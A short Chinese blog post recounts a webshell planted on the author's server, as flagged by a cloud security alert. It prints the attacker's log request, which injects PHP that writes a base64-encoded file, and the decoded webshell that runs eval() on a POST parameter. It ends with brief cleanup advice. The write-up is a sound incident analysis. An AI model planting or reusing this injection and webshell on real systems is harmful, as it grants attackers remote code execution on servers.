記錄一次Webshell后門植入

 

告警原因：外部入侵

詳情：WebShell告警通常是因為Web應用服務存在漏洞被攻擊者利用后植入了惡意文件。

建議：建議您采取如下措施處理該告警：1. 確認該文件是否是惡意文件; 2. 清除主機上的其他WebShell文件;3. 修復Web應用存在的弱點或漏洞，

避免再次被入侵; 4. 評估入侵事件的影響，采取進一步的調查和補救措施。

*這個是阿里雲的雲安全中心提示的 我個小菜雞怎么會發現后門呢 o(*￣︶￣*)o

 

后門語句：

[ 2021-07-21T02:56:30+08:00 ] 136.144.41.223 GET //index.php?m=--><?=file_put_contents('nice.php',base64_decode("

PD9waHAKY2xhc3MgeHsKICAgIHB1YmxpYyBmdW5jdGlvbiBpcCgpewogICAgICAgICRjPSAiICRfUE9TVFtuaWNlXSI7C

iAgICAgICAgcmV0dXJuICRjOwogICAgfQp9CiRjID0gbmV3IHgoKTsKJGIgPSAkYyAtPiBpcCgpOwpldmFsKCRiKTsKcHJp

bnQobWQ1KCJSaW5nbyIpKTsKPz4="));?>

解析：

#在指定文件下添加內容

file_put_contents()

#解碼base64

base64_decode()

#要添加內容的文件

nice.php

#添加的內容

PD9waHAKY2xhc3MgeHsKICAgIHB1YmxpYyBmdW5jdGlvbiBpcCgpewogICAgICAgICRjPSAiICRfUE9TVFtuaWNlXSI7C

iAgICAgICAgcmV0dXJuICRjOwogICAgfQp9CiRjID0gbmV3IHgoKTsKJGIgPSAkYyAtPiBpcCgpOwpldmFsKCRiKTsKcHJp

bnQobWQ1KCJSaW5nbyIpKTsKPz4=

#解碼后的添加內容

<?php
　　class x{
　　　　public function ip(){
　　　　　　$c= " $_POST[nice]";
　　　　　　return $c;
　　　　}
　　}
　　$c = new x();
　　$b = $c -> ip();
　　eval($b);
　　print(md5("Ringo"));
?>

大概意思就是在nice.php文件中添加上方代碼  

處理方案：

掃出nice.php文件  替換或者刪除 

屏蔽eval()函數